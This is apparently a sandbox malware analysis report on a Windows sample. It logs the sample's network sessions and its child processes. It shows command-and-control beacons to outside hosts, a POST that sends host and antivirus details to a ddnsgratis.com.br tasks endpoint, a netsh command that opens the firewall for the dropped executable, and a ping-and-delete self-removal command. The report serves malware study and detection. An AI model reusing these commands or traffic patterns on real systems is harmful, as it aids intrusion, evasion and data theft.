Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMxMC44MzQxOmNkNzliMmVhMjA2ZmQzNzJjNmE0ZjI1NjU0N2VjOTA4YWU2MGM5NGQ2ZjRkYmE5MTNhOGRlMjI1OTk4YTYzOTc6NjcxMjNjMzZjYmEyNw==';
Timestamp: Oct 18, 2024 12:45:11.223989010 CEST | Bytes transferred: 764 | Direction: IN
Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
74         | 192.168.2.9 | 50056       | 190.120.227.91 | 8080             | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp: Oct 18, 2024 12:45:11.938774109 CEST | Bytes transferred: 171 | Direction: OUT
Data:
GET /sobakavolos.gif?31430591=-1815539533 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
75         | 192.168.2.9 | 50057       | 185.53.178.50  | 80               | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp: Oct 18, 2024 12:45:16.550440073 CEST | Bytes transferred: 157 | Direction: OUT
Data:
GET /sobaka1.gif?31c7acfb=1551219421 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Timestamp: Oct 18, 2024 12:45:17.699736118 CEST | Bytes transferred: 1236 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:45:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ExRvyDzlzkuo38dDlcumIuPfj0VK/TdMkYSCL9a/ujVQEVVhx3r0Jcy8uZjM4X0FXC4YoFKHJgPPTwaP2PxbuA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Timestamp: Oct 18, 2024 12:45:17.699767113 CEST | Bytes transferred: 1236 | Direction: IN
Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMxNy4zNDU6M2JlMWZmZmE1ZDRiN2VlN2M2MzhiZmNhYmM5MTE1MGUyM2FmOGY3YTA2ZTU5MDlkNWQ4ZmY2ZTgzMzIzOGI4Nzo2NzEyM2MzZDU0M2Mx';var
Timestamp: Oct 18, 2024 12:45:17.699784040 CEST | Bytes transferred: 760 | Direction: IN
Data Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
76         | 192.168.2.9 | 50058       | 190.120.227.91 | 8080             | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp: Oct 18, 2024 12:45:17.932123899 CEST | Bytes transferred: 171 | Direction: OUT
Data:
GET /sobakavolos.gif?31e7f67c=-1054365092 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.9 | 50059 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:45:22.511851072 CEST | 156 | OUT | GET /sobaka1.gif?3269d32c=845796140 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:45:23.641213894 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:45:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Nqag8O/BcigfJAXC6bKFgQh4fqBMm+K0/qcy0/SywX2U0lPyZM54jGOy1Khfk7xqQfK5EcymE7C6zY2qSd0zOA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:45:23.641271114 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMyMy4yNTI5OjZkOGQ2YTE0ZGI3YjIxMjY3ODMwMmMyYTA0ZjllYjdhMjA0OTM0Yjg0ODllYjU4YzE1ZjUzOTZhMzViZTVlODk6NjcxMjNjNDMzZGJmZQ==';
Oct 18, 2024 12:45:23.641330004 CEST | 424 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:45:23.641710997 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 64 65 32 33 37 62 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 146de237bf');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.9 | 50060 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:45:23.722795963 CEST | 169 | OUT | GET /sobakavolos.gif?328f1419=848237593 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.9 | 50061 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:45:28.268994093 CEST | 158 | OUT | GET /sobaka1.gif?331ed01f=-1728675592 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:45:29.316989899 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:45:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_B2ikytowZxV6PPup8cT/sfcAS1jtzvpAu3Rx1H+3OMNSfTpQcRFbncGTIfCa8i/bL6EFHxWTFoXwwqfojF7YIQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:45:29.317040920 CEST | 203 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMyOC45NjQ1OmNjMDE0ZGUyODBkNzBmNmFjYmYzMDA5ODA0Y2EwNTU4M2ViODZlN2ZiOTU0OTU2OWNh
Oct 18, 2024 12:45:29.317079067 CEST | 1236 | IN | Data Raw: 36 66 39 0d 0a 4d 6d 52 6a 5a 6a 41 30 4d 6d 5a 6b 5a 47 51 31 4f 54 49 36 4e 6a 63 78 4d 6a 4e 6a 4e 44 68 6c 59 6a 64 68 4f 51 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65
Data Ascii: 6f9MmRjZjA0MmZkZGQ1OTI6NjcxMjNjNDhlYjdhOQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
Oct 18, 2024 12:45:29.317114115 CEST | 561 | IN | Data Raw: 74 68 65 20 72 65 71 75 65 73 74 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73
Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123c49&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3f6882a11ce430d639f45a82c6ede111cfa208d2');</scr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.9 | 50062 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:45:29.672257900 CEST | 170 | OUT | GET /sobakavolos.gif?3337cce9=1720097375 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.9 | 50063 | 194.5.152.215 | 80 | 7352 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:45:33.008384943 CEST | 453 | OUT | POST /n/tasks.php HTTP/1.0
Host: n.ddnsgratis.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded
Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
Content-length: 192
Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
Oct 18, 2024 12:45:38.939764023 CEST | 606 | IN | HTTP/1.1 404 Not Found
Date: Fri, 18 Oct 2024 10:45:33 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
X-Powered-By: PHP/5.6.14
Status: 404 Not Found
Content-Length: 377
Content-Type: text/html; charset=utf8
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.9 | 50064 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:45:35.067480087 CEST | 156 | OUT | GET /sobaka1.gif?33c00681=914368262 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:45:36.073040009 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:45:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_NYgiROPGw6JVTkhV3wd1IW+dXbNmsB6Qi6qFEANNUNJRg8YQ2EIZo2iXSeurW8o7zjqcnxZ8Wv7XXGwxGRdDXw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:45:36.073067904 CEST | 212 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMzNS42OTExOjZjNzA5MDdmODA3NTc1NmI3NDc4YmVkOTExYzMwMmMxMzQzZjNjMDMyNWI2NzgzNzIzNjIyNDVkM2Q
Oct 18, 2024 12:45:36.073091984 CEST | 2 | IN | Data Raw: 0d 0a
Data Ascii:
Oct 18, 2024 12:45:36.073106050 CEST | 1236 | IN | Data Ascii: 6ea2MTQ0OWU6NjcxMjNjNGZhOGJjNQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '
Oct 18, 2024 12:45:36.073122025 CEST | 546 | IN | Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123c4f&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '0ed5555189fac69ab5a504bf29336c4b251dae7e');</script><script


Target ID: 1
Start time: 06:41:29
Start date: 18/10/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe"
Imagebase: 0xab0000
File size: 2'496'512 bytes
MD5 hash: FA45B9C5E2A92B1B3D7D175C23FFC813
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:41:29
Start date: 18/10/2024
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff6791b0000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 4
Start time: 06:41:29
Start date: 18/10/2024
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff6791b0000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 6
Start time: 06:41:29
Start date: 18/10/2024
Path: C:\Windows\System32\dwm.exe
Wow64 process (32bit): false
Commandline: "dwm.exe"
Imagebase: 0x7ff6f73e0000
File size: 94'720 bytes
MD5 hash: 5C27608411832C5B39BA04E33D53536C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 10
Start time: 06:41:34
Start date: 18/10/2024
Path: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Imagebase: 0x970000
File size: 2'496'512 bytes
MD5 hash: FA45B9C5E2A92B1B3D7D175C23FFC813
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 95%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 11
Start time: 06:41:40
Start date: 18/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline:  /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE"
Imagebase: 0xc50000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 06:41:40
Start date: 18/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 06:41:40
Start date: 18/10/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0x220000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                                                          Start time:06:41:42
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline: /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                                          Start time:06:41:42
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                                          Start time:06:41:42
